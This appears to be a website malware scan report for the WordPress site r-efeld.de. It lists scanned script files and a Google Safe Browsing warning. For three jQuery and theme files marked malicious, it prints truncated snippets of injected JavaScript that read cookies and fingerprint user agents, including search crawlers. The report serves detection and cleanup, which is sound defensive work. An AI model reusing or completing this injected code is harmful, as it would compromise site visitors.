Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=r-efeld.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.r-efeld.de/ | 200 OK Content-Length: 43786 Content-Type: text/html | clean |
http://www.r-efeld.de/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94136 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://www.r-efeld.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8251 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.r-efeld.de/wp-content/plugins/ft-calendar/includes/js/jquery.tools.min.js?ver=3.8.4 | 200 OK Content-Length: 4752 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/plugins/ft-calendar/includes/js/single-post-page-shorts.js?ver=3.8.4 | 200 OK Content-Length: 3515 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 3874 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/superfish.js?ver=1.0 | 200 OK Content-Length: 4884 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/supersub.js?ver=1.0 | 200 OK Content-Length: 4437 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t 'float' : liFloat, 'width' : '100%', 'white-space' : 'normal' }) .each(function(){ var $childUl = $('>ul',this); var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery); Antivirus reports:
| ||
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/hoverIntent.js?ver=1.0 | 200 OK Content-Length: 4308 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/gdl-scripts.js?ver=1.0 | 200 OK Content-Length: 9271 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/jquery.easing.js?ver=1.0 | 200 OK Content-Length: 9352 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/jquery.prettyPhoto.js?ver=1.0 | 200 OK Content-Length: 27493 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/jquery.flexslider.js?ver=1.0 | 200 OK Content-Length: 43812 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/themes/modernize-v3-11/javascript/jquery.filterable.js?ver=1.0 | 200 OK Content-Length: 8203 Content-Type: application/javascript | clean |
http://www.r-efeld.de/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-de.js?ver=2.6.5 | 200 OK Content-Length: 7991 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: r-efeld.de
Result:
GET / HTTP/1.1
Host: r-efeld.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: r-efeld.de
Referer: http://www.google.com/search?q=r-efeld.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: r-efeld.de
Referer: http://www.google.com/search?q=r-efeld.de
Result:
The result is similar to the first query. There are no suspicious redirects found.